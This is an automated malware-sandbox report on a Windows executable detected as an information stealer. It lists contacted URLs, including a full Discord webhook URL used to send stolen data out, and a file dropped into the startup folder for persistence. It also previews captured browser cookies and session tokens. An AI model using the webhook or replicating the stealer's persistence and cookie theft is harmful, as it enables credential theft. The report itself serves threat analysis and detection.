                            		unknown
                            https://go.microsofpowershell.exe, 00000017.00000002.2287696510.0000024937C3C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.1740029520.000001D300228000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1757050367.000001D310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4F48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4E05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC674A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AE7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002492100A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ip-api.comzamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB0357000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://oneget.orgXpowershell.exe, 0000000A.00000002.1817451274.000001BEC658C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.0000024920AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://go.microsoft.cogDypowershell.exe, 00000008.00000002.1792975353.00000113FEC8D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4NzamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB07B7000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB02F1000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://aka.ms/pscore68powershell.exe, 00000005.00000002.1740029520.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778231738.000001138005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778231738.000001138001D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC4D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE595B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002491F651000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ip-api.com/json/?fields=225545PzamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ptb.discord.comzamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB066C000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namezamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB02F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1740029520.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778231738.000001138001D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC4D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE595B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002491F651000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://go.mpowershell.exe, 00000017.00000002.2287696510.0000024937C3C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://oneget.orgpowershell.exe, 0000000A.00000002.1817451274.000001BEC658C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.0000024920AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ip-api.com/json/?fields=225545zamPeEkHWr.exe, kaS9T.scr.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-zamPeEkHWr.exe, kaS9T.scr.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.microspowershell.exe, 00000005.00000002.1766639509.000001D36A990000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            208.95.112.1
                            		ip-api.comUnited States
                            		53334TUT-ASUStrue
                            162.159.138.232
                            		ptb.discord.comUnited States
                            		13335CLOUDFLARENETUStrue

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1488036
                            Start date and time:2024-08-05 15:42:55 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 45s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:31
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:zamPeEkHWr.exe
                            renamed because original name is a hash value
                            Original Sample Name:824d0e2ebaa40b7bca3bc0657338a13df78121172fe52e604f45c8033ab7537a.exe
                            Detection:MAL
                            Classification:mal100.troj.adwa.spyw.evad.winEXE@40/23@3/2
                            EGA Information:
                            • Successful, ratio: 16.7%
                            HCA Information:
                            • Successful, ratio: 63%
                            • Number of executed functions: 325
                            • Number of non-executed functions: 24
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.184.195
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target powershell.exe, PID 6980 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7644 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7672 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7888 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 8008 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: zamPeEkHWr.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            09:43:47API Interceptor5x Sleep call for process: WMIC.exe modified
                            09:43:49API Interceptor30x Sleep call for process: powershell.exe modified
                            09:43:50API Interceptor10878x Sleep call for process: zamPeEkHWr.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            208.95.112.1QU0094675.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • ip-api.com/line/?fields=hosting
                            IDLBk4XMUa.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                            • ip-api.com/json/?fields=225545
                            Vjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                            • ip-api.com/json/?fields=225545
                            3.bin.exeGet hashmaliciousGo InjectorBrowse
                            • ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
                            raw.ps1Get hashmaliciousUnknownBrowse
                            • ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
                            #U202f#U202f#U2005#U00a0.scr.exeGet hashmaliciousBlank GrabberBrowse
                            • ip-api.com/json/?fields=225545
                            NaOH.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                            • ip-api.com/json/?fields=225545
                            XWorm.V5.6.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            oc 1337.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            162.159.138.232IDLBk4XMUa.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                              http://dc.tensgpt.com/branding/Get hashmaliciousUnknownBrowse
                                SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                  VaTlw2kNGc.exeGet hashmaliciousBlank Grabber, DCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                    Zoom_workspace.htaGet hashmaliciousCobalt Strike, Clipboard HijackerBrowse
                                      qqgv6uKJOd.exeGet hashmaliciousClipboard HijackerBrowse
                                        http://discord-proxy.tassadar2002.workers.dev/Get hashmaliciousUnknownBrowse
                                          http://dapi.190823.xyz/Get hashmaliciousUnknownBrowse
                                            LisectAVT_2403002A_147.exeGet hashmaliciousBlank GrabberBrowse
                                              LisectAVT_2403002A_368.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ip-api.comQU0094675.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 208.95.112.1
                                                IDLBk4XMUa.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                • 208.95.112.1
                                                Vjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                                                • 208.95.112.1
                                                3.bin.exeGet hashmaliciousGo InjectorBrowse
                                                • 208.95.112.1
                                                raw.ps1Get hashmaliciousUnknownBrowse
                                                • 208.95.112.1
                                                #U202f#U202f#U2005#U00a0.scr.exeGet hashmaliciousBlank GrabberBrowse
                                                • 208.95.112.1
                                                NaOH.exeGet hashmaliciousXWormBrowse
                                                • 208.95.112.1
                                                SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                • 208.95.112.1
                                                XWorm.V5.6.exeGet hashmaliciousXWormBrowse
                                                • 208.95.112.1
                                                oc 1337.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                ptb.discord.comIDLBk4XMUa.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                • 162.159.138.232
                                                golang-modules.exeGet hashmaliciousUnknownBrowse
                                                • 162.159.136.232
                                                golang-modules.exeGet hashmaliciousUnknownBrowse
                                                • 162.159.137.232
                                                SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                                • 162.159.128.233
                                                SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                                • 162.159.128.233
                                                KzqQe0QtRd.exeGet hashmaliciousUnknownBrowse
                                                • 162.159.137.232
                                                PAP46E1UkZ.exeGet hashmaliciousUnknownBrowse
                                                • 162.159.128.233
                                                A4AxThCBqS.exeGet hashmaliciousNanocore, Luna Logger, Umbral StealerBrowse
                                                • 162.159.136.232
                                                SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exeGet hashmaliciousCKS Stealer, Spark RATBrowse
                                                • 162.159.137.232
                                                SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exeGet hashmaliciousCKS Stealer, Spark RATBrowse
                                                • 162.159.138.232

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUShttp://verizonwireless-employmentvalidation.comGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                SHANDONG FU EN - PARTICULARS.xls.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 172.67.74.152
                                                Bank swift.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.96.3
                                                Hollandco Company Guidelines Employee Handbook___fdp (1).docxGet hashmaliciousTycoon2FABrowse
                                                • 104.21.46.160
                                                BPO-044634.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.96.3
                                                Employee performance.exeGet hashmaliciousFormBookBrowse
                                                • 23.227.38.74
                                                https://content.app-us1.com/LedEn/2024/08/03/19c502f2-d7fc-4021-b067-e9b1cf078dac.pdfGet hashmaliciousHTMLPhisherBrowse
                                                • 104.17.31.174
                                                Hollandco Company Guidelines Employee Handbook___fdp (1).docxGet hashmaliciousHTMLPhisherBrowse
                                                • 104.21.46.160
                                                INVOICE-25738 UNIVERSAL BEARING.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                Invoice_No.10.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 172.67.74.152
                                                TUT-ASUSQU0094675.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 208.95.112.1
                                                IDLBk4XMUa.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                • 208.95.112.1
                                                Vjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                                                • 208.95.112.1
                                                3.bin.exeGet hashmaliciousGo InjectorBrowse
                                                • 208.95.112.1
                                                raw.ps1Get hashmaliciousUnknownBrowse
                                                • 208.95.112.1
                                                #U202f#U202f#U2005#U00a0.scr.exeGet hashmaliciousBlank GrabberBrowse
                                                • 208.95.112.1
                                                NaOH.exeGet hashmaliciousXWormBrowse
                                                • 208.95.112.1
                                                SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                • 208.95.112.1
                                                XWorm.V5.6.exeGet hashmaliciousXWormBrowse
                                                • 208.95.112.1
                                                oc 1337.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0eSHANDONG FU EN - PARTICULARS.xls.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 162.159.138.232
                                                INVOICE-25738 UNIVERSAL BEARING.exeGet hashmaliciousAgentTeslaBrowse
                                                • 162.159.138.232
                                                Invoice_No.10.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 162.159.138.232
                                                Original copy of Bill of Lading, Invoice, PDA.bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • 162.159.138.232
                                                Payment Advice-DPEB08-2SDC - SS25 Price C246SH32.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 162.159.138.232
                                                PO#86637 copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 162.159.138.232
                                                RFQ-010922-0725-ZA.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • 162.159.138.232
                                                IDLBk4XMUa.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                • 162.159.138.232
                                                7vwoFTXTwe.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 162.159.138.232
                                                Vjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                                                • 162.159.138.232

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr

                                                Download File
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):232448
                                                Entropy (8bit):6.020784348942329
                                                Encrypted:false
                                                SSDEEP:6144:eloZM3fsXtioRkts/cnnK6cMluDdCFzQEb0CzFQMpnhb8e1msQci:IoZ1tlRk83MluDdCFzQEb0CzFQMpZ3K
                                                MD5:EF323A7483653FFB1FC4FF036576E065
                                                SHA1:80E63B57A7AD6394F778C7AA5A855520F1533589
                                                SHA-256:824D0E2EBAA40B7BCA3BC0657338A13DF78121172FE52E604F45C8033AB7537A
                                                SHA-512:04785049F73ACBACC2B0EA89E2BBC547AC6FA302EAC4CBBD895F8D6A873C8B0DCFA8A8762D90847C9A0BF28862E12B294CB70F073019A6046BAC104B9189BA7E
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, Author: Joe Security
                                                • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, Author: Joe Security
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, Author: ditekSHen
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 82%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0................. ........@.. ....................................`.....................................O.......P............................................................................ ............... ..H............text....... ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B.......................H.......@...@.......6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                                                C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zamPeEkHWr.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1965
                                                Entropy (8bit):5.377802142292312
                                                Encrypted:false
                                                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                                MD5:582A844EB067319F705A5ADF155DBEB0
                                                SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                                SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                                SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                                Malicious:true
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................

                                                C:\Users\user\AppData\Local\Temp\9mnNSrbpbgmC2pt.ligma

                                                Download File
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):654155
                                                Entropy (8bit):7.998161685761209
                                                Encrypted:true
                                                SSDEEP:12288:KJRwvLVs2hjIoZcuDu8hrf0xmNOWswPJBgaUq4ucu6WJwBkBv/Wh/MgIwWdU:pvCNJG7BghH66ywBauh/MgIwSU
                                                MD5:F91F5B81E2704E961CA97645225F7953
                                                SHA1:4FD698BBFCD486FB4989940178054E11C82F934A
                                                SHA-256:F83845E19588E562D12A78519CEF348D54D47ED2E88567F52EE8B8042E1F7124
                                                SHA-512:20A4AB9BA43981178452AA6B35C74D03E62C3012690651C06C3D9FCC592866E68434658F9719296BD9BC66FAC813381933490569B67B622B39732CD40CE4A241
                                                Malicious:false
                                                Preview:PK.........M.Y{..........#...Browsers\Cookies\Chrome Cookies.txt.WK....].).#..n....E/x..m.~oZ.....<..5.o..3.$Rn..,....:u..9_...}.......=s.b{.. ...$@.H.Bn2.9...x..<.....S...w].E..'.E..3.[,d....'....i......P...,t.6_Xw2n..>...Y+...sgK.q.n..l.....z...?W.t......e.y.[.'~~.d1`...m....p;h.(......yY?...<.......E.!2......{R...Z^.'.R..2o..+.yya....}.g|.....e.!.....[.R.....s.gx......Ft..].....U.@..7..e.M....~`1=.l...,ca.4..c..C2./.W....8...P<..E..I..7|^'Q......B<,...EM-.u...3......OfS...)..v..H....V9..i.AkZ........).B.n.:....J~...%).....v...v....mJ.:..X..#v...0.mP#..2.#G.,.z.c..S]E.... .......k..e06s.5.[...2x.,.pYO...,..4:..f..>.y..!.YO."...E..A"..v:..&Hr...#...g.O..x1.b.$.#.}...f.&KYD.H.,.Y..7..g-....(c..+.1"4.......~.#H...._}../. B |Z..O...HTB..P.@.-..^..`@;.......v~A.E.b......I..>..I.n.Yx\...q.....'%.".-6..?H.EB..".9?y.NU.!QR...)".h.....E..P.g........1z..2S.Ii..... .c.>#03.....JI...b@.eV..C....\.Y...E..v.....%j.^.x.l..V.{z.........f?..3Z....

                                                C:\Users\user\AppData\Local\Temp\9mnNSrbpbgmC2pt\Browsers\Cookies\Chrome Cookies.txt

                                                Download File
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:ASCII text, with very long lines (522), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):3345
                                                Entropy (8bit):5.8601905602672835
                                                Encrypted:false
                                                SSDEEP:96:jJMpoO2gFcRqFZL2L+yLstv3pPDYReynqsbCw4R2cksr:NFFRiNEUd7
                                                MD5:A3E0FD5B00C49B355B00B3083DA7C5CB
                                                SHA1:A809B694054810FE687456F187E5FC2C2CEFA507
                                                SHA-256:592564F2EB5C54230CC985CDAB59C4AFD497EA11DC922CC72DF20172556B1354
                                                SHA-512:EEB56A85B9200B40F5CBFD0CFEEA2F1E70B1C56F775EE186C5030B6E494C3F72614B8E728AF45BADA3216D74F45CD84FBAF000026A786F92235741D260C13A24
                                                Malicious:false
                                                Preview:.google.com.TRUE./.FALSE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.TRUE.13340887435186329..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474...microsoft.com.TRUE./.FALSE.13372422837017624.MC1.GUID=749eee6039c5489b9db3000c7ab3f

                                                C:\Users\user\AppData\Local\Temp\9mnNSrbpbgmC2pt\Display\Display.png

                                                Download File
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):671218
                                                Entropy (8bit):7.923452668069569
                                                Encrypted:false
                                                SSDEEP:12288:mVeAAv2LReLVHg/7wrGWfpK9ymlC9b8TOYYVJkdTij3q/WJE0Pf:Kv8gReLVHY7y3fU95li90Tij627f
                                                MD5:B562A2CC6B923F1EFE9C61DAAEBCF70D
                                                SHA1:5F89B1335901F87657823B2AF79D778E79AD6881
                                                SHA-256:07CB1944AD2C7E58679439A802650173CEA4657B280DEC88B0882EE5FE964019
                                                SHA-512:5A22E50E86E1C2DD974B6027D53556D80C7F9EE6A426888971E80F6A442830E195E66BFB493C496090545608349A77CAC1E914C66725214E3756518ED86748BC
                                                Malicious:false
